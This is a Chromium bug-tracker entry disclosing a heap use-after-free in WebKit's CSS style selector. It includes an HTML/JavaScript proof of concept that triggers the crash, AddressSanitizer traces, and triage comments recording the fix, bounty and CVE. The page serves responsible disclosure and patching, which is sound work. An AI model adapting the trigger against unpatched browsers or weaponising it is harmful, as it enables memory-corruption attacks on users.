Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner: ----
Closed: Jan 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::CSSStyleSelector::matchRulesForList
Reported by ax3...@gmail.com, Jan 10 2012 Back to list
VULNERABILITY DETAILS
Use-after-free bug can be triggered when accessing element CSS after deleting rule.

VERSION
Crash on 18.0.1000.0 (Developer Build 116831 Linux) and 16.0.912.75 m, Windows7 x64 
Does not crash on 16.0.912.63, Ubuntu 10.10 x64.

REPRODUCTION CASE
<html>
    <head>
        <script>
        function body_start() {
            q = document.getElementById('root').contentDocument;
            document.open();
            q.styleSheets[0].deleteRule(1);
            q.getElementById('head').cloneNode(1);
        }
        </script>
    </head>
    <body>
        <object data="a.html" id="root" onload="body_start()"/></object>
    </body>
</html>

--- a.html ---
<html>
    <head id='head'>
        <title id='test'>poc</title>
        <style>
        html {}
        #test {}
        </style>
    </head>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
==19176== ERROR: AddressSanitizer heap-use-after-free on address 0x7fe97cc63f90 at pc 0x7fe9b325cd07 bp 0x7fff8e4772a0 sp 0x7fff8e477298
READ of size 8 at 0x7fe97cc63f90 thread T0
    #0 0x7fe9b325cd07 in WTF::RefPtr<WebCore::CSSMutableStyleDeclaration>::get() const /usr/local/google/asan/asan-llvm-trunk/llvm/projects/compiler-rt/lib/asan/asan_linux.cc:0
    #1 0x7fe9b36b3815 in WebCore::CSSStyleSelector::matchRulesForList(WTF::Vector<WebCore::RuleData, 0ul> const*, int&, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:756
    #2 0x7fe9b36b2fd5 in WebCore::CSSStyleSelector::matchRules(WebCore::RuleSet*, int&, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:654
    #3 0x7fe9b36b505c in WebCore::CSSStyleSelector::matchAllRules(WebCore::CSSStyleSelector::MatchResult&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:854
    #4 0x7fe9b36b11f1 in WebCore::CSSStyleSelector::styleForElement(WebCore::Element*, WebCore::RenderStyle*, bool, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:1307
    #5 0x7fe9b30d2f22 in WebCore::Element::styleForRenderer() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:1025
    #6 0x7fe9b321c4ac in WebCore::HTMLTitleElement::textWithDirection() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLTitleElement.cpp:84
    #7 0x7fe9b321c362 in WebCore::HTMLTitleElement::childrenChanged(bool, WebCore::Node*, WebCore::Node*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLTitleElement.cpp:61
    #8 0x7fe9b3065924 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/ContainerNode.cpp:667
    #9 0x7fe9b3069ce5 in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #10 0x7fe9b30cd81f in WebCore::Element::cloneElementWithChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:157
    #11 0x7fe9b30cd701 in WebCore::Element::cloneNode(bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:151
    #12 0x7fe9b3069cce in WebCore::ContainerNode::cloneChildNodes(WebCore::ContainerNode*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/ContainerNode.cpp:865
    #13 0x7fe9b30cd81f in WebCore::Element::cloneElementWithChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:157
    #14 0x7fe9b30cd701 in WebCore::Element::cloneNode(bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:151
    #15 0x7fe9b42ac98d in WebCore::NodeInternal::cloneNodeCallback(v8::Arguments const&) /media/Chromium/chromium/depot_tools/src/out/Release/obj/gen/webcore/bindings/V8Node.cpp:217
    #16 0x7fe9b2213053 in HandleApiCallHelper /media/Chromium/chromium/depot_tools/src/v8/src/builtins.cc:1220
    #17 0x7fe98020420e in  
    #18 0x7fe980229473 in  
    #19 0x7fe9802417bb in  
    #20 0x7fe9802292d5 in  
    #21 0x7fe98021fa67 in  
    #22 0x7fe9802072b7 in  
    #23 0x7fe9b225cdbb in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) /media/Chromium/chromium/depot_tools/src/v8/src/execution.cc:118
    #24 0x7fe9b21c7117 in v8::internal::Isolate::handle_scope_implementer() /media/Chromium/chromium/depot_tools/src/v8/src/isolate.h:838
    #25 0x7fe9b35ac9cf in WebCore::V8Proxy::instrumentedCallFunction(WebCore::Page*, v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:428
    #26 0x7fe9b35ac6ac in WebCore::V8Proxy::callFunction(v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:403
    #27 0x7fe9b359c1d3 in WebCore::V8LazyEventListener::callListenerFunction(WebCore::ScriptExecutionContext*, v8::Handle<v8::Value>, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8LazyEventListener.cpp:69
    #28 0x7fe9b3ac24fd in WebCore::V8AbstractEventListener::invokeEventHandler(WebCore::ScriptExecutionContext*, WebCore::Event*, v8::Handle<v8::Value>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:152
    #29 0x7fe9b3ac20d8 in WebCore::V8AbstractEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:98
    #30 0x7fe9b30e510d in WebCore::EventTarget::fireEventListeners(WebCore::Event*, WebCore::EventTargetData*, WTF::Vector<WebCore::RegisteredEventListener, 1ul>&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:214
    #31 0x7fe9b30e4dd7 in WebCore::EventTarget::fireEventListeners(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:199
    #32 0x7fe9b310709e in WebCore::Node::handleLocalEvents(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2730
    #33 0x7fe9b318b64e in WebCore::EventDispatcher::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:319
    #34 0x7fe9b3189a1d in WebCore::EventDispatchMediator::dispatchEvent(WebCore::EventDispatcher*) const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatchMediator.cpp:51
    #35 0x7fe9b318a491 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node*, WTF::PassRefPtr<WebCore::EventDispatchMediator>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:55
    #36 0x7fe9b3107371 in WebCore::Node::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2744
    #37 0x7fe9b395508c in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #38 0x7fe9b30815de in WebCore::Document::dispatchWindowLoadEvent() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:3649
    #39 0x7fe9b307c4e7 in WebCore::Document::implicitClose() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:2226
    #40 0x7fe9b38bcf5a in WebCore::FrameLoader::checkCompleted() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:740
    #41 0x7fe9b38bb144 in WebCore::FrameLoader::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:676
    #42 0x7fe9b308ea62 in WebCore::Document::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:4396
    #43 0x7fe9b3292217 in WebCore::HTMLDocumentParser::prepareToStopParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:153
    #44 0x7fe9b38a7cac in WebCore::DocumentWriter::endIfNotLoadingMainResource() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/DocumentWriter.cpp:234
    #45 0x7fe9b38c8c6a in WTF::RefPtr<WebCore::DocumentLoader>::operator->() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:66
    #46 0x7fe9b38e0180 in WebCore::MainResourceLoader::didFinishLoading(double) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/MainResourceLoader.cpp:485
    #47 0x7fe9b486c68d in webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest(net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&) /media/Chromium/chromium/depot_tools/src/webkit/glue/weburlloader_impl.cc:647
    #48 0x7fe9b2b89c62 in ResourceDispatcher::OnRequestComplete(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:489
    #49 0x7fe9b2b8af36 in bool ResourceMsg_RequestComplete::Dispatch<ResourceDispatcher, ResourceDispatcher, void (ResourceDispatcher::*)(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&)>(IPC::Message const*, ResourceDispatcher*, ResourceDispatcher*, void (ResourceDispatcher::*)(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&)) /media/Chromium/chromium/depot_tools/src/./content/common/resource_messages.h:168
    #50 0x7fe9b2b877a6 in ResourceDispatcher::DispatchMessage(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:559
    #51 0x7fe9b2b86954 in ResourceDispatcher::OnMessageReceived(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:326
    #52 0x7fe9b2a9919a in ChildThread::OnMessageReceived(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/child_thread.cc:172
    #53 0x7fe9b2bdc0ae in IPC::ChannelProxy::Context::OnDispatchMessage(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/ipc/ipc_channel_proxy.cc:263
    #54 0x7fe9b2be1418 in base::internal::InvokeHelper<false, void, base::internal::RunnableAdapter<void (IPC::ChannelProxy::Context::*)(IPC::Message const&)>, void ()(IPC::ChannelProxy::Context* const&, IPC::Message const&)>::MakeItSo(base::internal::RunnableAdapter<void (IPC::ChannelProxy::Context::*)(IPC::Message const&)>, IPC::ChannelProxy::Context* const&, IPC::Message const&) /media/Chromium/chromium/depot_tools/src/./base/bind_internal.h:897
    #55 0x7fe9b175b6b3 in MessageLoop::RunTask(base::PendingTask const&) /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:459
    #56 0x7fe9b175bd04 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:470
    #57 0x7fe9b175c0be in MessageLoop::DoWork() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:660
    #58 0x7fe9b17689de in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /media/Chromium/chromium/depot_tools/src/base/message_pump_default.cc:28
    #59 0x7fe9b175adc4 in MessageLoop::RunInternal() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:418
    #60 0x7fe9b1759a88 in MessageLoop::Run() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:301
    #61 0x7fe9b524ed38 in RendererMain(content::MainFunctionParams const&) /media/Chromium/chromium/depot_tools/src/content/renderer/renderer_main.cc:241
    #62 0x7fe9b16c9734 in (anonymous namespace)::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) /media/Chromium/chromium/depot_tools/src/content/app/content_main.cc:233
    #63 0x7fe9b16c92cb in (anonymous namespace)::RunNamedProcessTypeMain(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, content::MainFunctionParams const&, content::ContentMainDelegate*) /media/Chromium/chromium/depot_tools/src/content/app/content_main.cc:271
0x7fe97cc63f90 is located 16 bytes inside of 32-byte region [0x7fe97cc63f80,0x7fe97cc63fa0)
freed by thread T0 here:
    #0 0x7fe9b5bf69b4 in free ??:0
    #1 0x7fe9b369b8d6 in WTF::Vector<WTF::RefPtr<WebCore::CSSRule>, 0ul>::remove(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/Vector.h:1099
    #2 0x7fe9b36f48e4 in WebCore::CSSStyleSheet::deleteRule(unsigned int, int&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSheet.cpp:177
    #3 0x7fe9b41be627 in WebCore::CSSStyleSheetInternal::deleteRuleCallback(v8::Arguments const&) /media/Chromium/chromium/depot_tools/src/out/Release/obj/gen/webcore/bindings/V8CSSStyleSheet.cpp:113
    #4 0x7fe9b2213053 in HandleApiCallHelper /media/Chromium/chromium/depot_tools/src/v8/src/builtins.cc:1220
    #5 0x7fe98020420e in  
    #6 0x7fe98022942a in  
    #7 0x7fe9802417bb in  
    #8 0x7fe9802292d5 in  
    #9 0x7fe98021fa67 in  
    #10 0x7fe9802072b7 in  
    #11 0x7fe9b225cdbb in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) /media/Chromium/chromium/depot_tools/src/v8/src/execution.cc:118
    #12 0x7fe9b21c7117 in v8::internal::Isolate::handle_scope_implementer() /media/Chromium/chromium/depot_tools/src/v8/src/isolate.h:838
    #13 0x7fe9b35ac9cf in WebCore::V8Proxy::instrumentedCallFunction(WebCore::Page*, v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:428
    #14 0x7fe9b35ac6ac in WebCore::V8Proxy::callFunction(v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:403
    #15 0x7fe9b359c1d3 in WebCore::V8LazyEventListener::callListenerFunction(WebCore::ScriptExecutionContext*, v8::Handle<v8::Value>, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8LazyEventListener.cpp:69
    #16 0x7fe9b3ac24fd in WebCore::V8AbstractEventListener::invokeEventHandler(WebCore::ScriptExecutionContext*, WebCore::Event*, v8::Handle<v8::Value>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:152
    #17 0x7fe9b3ac20d8 in WebCore::V8AbstractEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:98
    #18 0x7fe9b30e510d in WebCore::EventTarget::fireEventListeners(WebCore::Event*, WebCore::EventTargetData*, WTF::Vector<WebCore::RegisteredEventListener, 1ul>&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:214
    #19 0x7fe9b30e4dd7 in WebCore::EventTarget::fireEventListeners(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:199
    #20 0x7fe9b310709e in WebCore::Node::handleLocalEvents(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2730
    #21 0x7fe9b318b64e in WebCore::EventDispatcher::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:319
    #22 0x7fe9b3189a1d in WebCore::EventDispatchMediator::dispatchEvent(WebCore::EventDispatcher*) const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatchMediator.cpp:51
    #23 0x7fe9b318a491 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node*, WTF::PassRefPtr<WebCore::EventDispatchMediator>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:55
    #24 0x7fe9b3107371 in WebCore::Node::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2744
    #25 0x7fe9b395508c in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #26 0x7fe9b30815de in WebCore::Document::dispatchWindowLoadEvent() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:3649
    #27 0x7fe9b307c4e7 in WebCore::Document::implicitClose() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:2226
    #28 0x7fe9b38bcf5a in WebCore::FrameLoader::checkCompleted() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:740
    #29 0x7fe9b38bb144 in WebCore::FrameLoader::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:676
previously allocated by thread T0 here:
    #0 0x7fe9b5bf6a94 in malloc ??:0
    #1 0x7fe9b2d30cfb in WTF::fastMalloc(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/FastMalloc.cpp:268
    #2 0x7fe9b3670c4e in WebCore::CSSStyleRule::create(WebCore::CSSStyleSheet*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleRule.h:39
    #3 0x7fe9b36704a5 in WebCore::CSSParser::createStyleRule(WTF::Vector<WTF::OwnPtr<WebCore::CSSParserSelector>, 0ul>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSParser.cpp:7634
    #4 0x7fe9b4328933 in cssyyparse(void*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSGrammar.y:847
    #5 0x7fe9b3633bc7 in WebCore::CSSParser::parseSheet(WebCore::CSSStyleSheet*, WTF::String const&, int, WTF::HashMap<WebCore::CSSStyleRule*, WTF::RefPtr<WebCore::CSSRuleSourceData>, WTF::PtrHash<WebCore::CSSStyleRule*>, WTF::HashTraits<WebCore::CSSStyleRule*>, WTF::HashTraits<WTF::RefPtr<WebCore::CSSRuleSourceData> > >*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSParser.cpp:282
    #6 0x7fe9b36f4d98 in WebCore::CSSStyleSheet::parseStringAtLine(WTF::String const&, bool, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSheet.cpp:217
    #7 0x7fe9b58d5451 in WTF::RefPtr<WebCore::CSSStyleSheet>::operator->() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:66
    #8 0x7fe9b58d4cd1 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #9 0x7fe9b58d4f31 in WebCore::StyleElement::finishParsingChildren(WebCore::Element*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/StyleElement.cpp:110
    #10 0x7fe9b58f3b05 in WebCore::HTMLStyleElement::finishParsingChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLStyleElement.cpp:66
    #11 0x7fe9b330cfc7 in WebCore::HTMLElementStack::popCommon() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLElementStack.cpp:596
    #12 0x7fe9b32b6214 in WebCore::HTMLTreeBuilder::processEndTag(WebCore::AtomicHTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:2164
    #13 0x7fe9b32b3e28 in WebCore::HTMLTreeBuilder::constructTreeFromAtomicToken(WebCore::AtomicHTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:474
    #14 0x7fe9b32b3d38 in WebCore::HTMLTreeBuilder::constructTreeFromToken(WebCore::HTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:461
    #15 0x7fe9b3292659 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:263
    #16 0x7fe9b3293895 in WebCore::HTMLDocumentParser::append(WebCore::SegmentedString const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:372
    #17 0x7fe9b58d0d3e in WebCore::DecodedDataDocumentParser::appendBytes(WebCore::DocumentWriter*, char const*, unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/DecodedDataDocumentParser.cpp:50
    #18 0x7fe9b3897ae1 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #19 0x7fe9b2cbe06b in WebKit::FrameLoaderClientImpl::committedLoad(WebCore::DocumentLoader*, char const*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebKit/chromium/src/FrameLoaderClientImpl.cpp:1118
    #20 0x7fe9b38979e0 in void WTF::derefIfNotNull<WebCore::DocumentLoader>(WebCore::DocumentLoader*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:52
    #21 0x7fe9b38f4aa2 in WebCore::ResourceLoader::didReceiveData(char const*, int, long long, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/ResourceLoader.cpp:291
    #22 0x7fe9b38e001d in void WTF::derefIfNotNull<WebCore::MainResourceLoader>(WebCore::MainResourceLoader*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:52
==19176== ABORTING
Stats: 31M malloced (24M for red zones) by 61911 calls
Stats: 1M realloced by 1161 calls
Stats: 27M freed by 47654 calls
Stats: 0M really freed by 0 calls
Stats: 80M (20493 full pages) mmaped in 20 calls
  mmaps   by size class: 8:65532; 9:8191; 10:4095; 11:2047; 12:1024; 13:1024; 14:256; 15:256; 16:64; 17:64; 18:16; 19:8; 21:4;
  mallocs by size class: 8:48844; 9:6771; 10:3288; 11:1241; 12:351; 13:990; 14:135; 15:224; 16:18; 17:40; 18:1; 19:4; 21:4;
  frees   by size class: 8:36629; 9:5623; 10:2962; 11:881; 12:240; 13:949; 14:109; 15:217; 16:11; 17:24; 18:1; 19:4; 21:4;
  rfrees  by size class:
Stats: malloc large: 49 small slow: 334
Shadow byte and word:
  0x1ffd2f98c7f2: fd
  0x1ffd2f98c7f0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffd2f98c7d0: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7d8: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7e0: fa fa fa fa fa fa fa fa
  0x1ffd2f98c7e8: fa fa fa fa fa fa fa fa
=>0x1ffd2f98c7f0: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7f8: fd fd fd fd fd fd fd fd
  0x1ffd2f98c800: fa fa fa fa fa fa fa fa
  0x1ffd2f98c808: fa fa fa fa fa fa fa fa
  0x1ffd2f98c810: fd fd fd fd fd fd fd fd


 
Comment 1 by cdn@chromium.org, Jan 10 2012
Labels: -Pri-0 -Area-Undefined Pri-1 SecSeverity-High SecImpacts-Stable SecImpacts-Beta OS-All Mstone-16 Area-WebKit
Status: Available
Filed upstream at https://bugs.webkit.org/show_bug.cgi?id=75987
10973156.zip
445 bytes Download
Summary: Heap-use-after-free in WebCore::CSSStyleSelector::matchRulesForList (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=10973156

Uploader: cdn@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f56a290fe90
Crash State:
  - crash stack -
  WebCore::CSSStyleSelector::matchRulesForList
  WebCore::CSSStyleSelector::matchRules
  - free stack -
  WebCore::CSSStyleSheet::deleteRule
  WebCore::CSSStyleSheetInternal::deleteRuleCallback
  

Minimized Testcase (0.43 Kb): https://cluster-fuzz.appspot.com/download/AMIfv969AJk2J8gSu3Y6RxTaUQ4O7Jl2VeENm-0hNP6SP1pp69vpJu35r-30JYnUkGE3Kiq_CiU9tgvq5S3qvgM9fw_ss6TDLjm1X02bXbAN6-_af-F8r96bgkQ7aEbXlxZsW_-iyA7RahAQ-NwHdP9fVsFWFXD5SQ
Labels: Stability-AddressSanitizer
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Confirming that this is fixed by http://trac.webkit.org/changeset/104845. Spoken by ClusterFuzz, Antti, and Andreas. Yipee! we can now merge to stable soon.
Labels: reward-topanel
Labels: -Mstone-16 Mstone-17
Labels: -reward-topanel reward-1000 reward-unpaid
These cross-document DOM issues you are uncovering are pretty awesome. $1000

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: -Merge-Approved Merge-Merged merge-merged-963
merged to m17 in r105786
Labels: -reward-unpaid
Labels: CVE-2011-3968
Comment 11 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 12 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 13 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Area-WebKit -Stability-AddressSanitizer -Mstone-17 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Project Member Comment 14 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 15 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 18 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 19 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 20 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 21 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 22 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 23 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 24 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment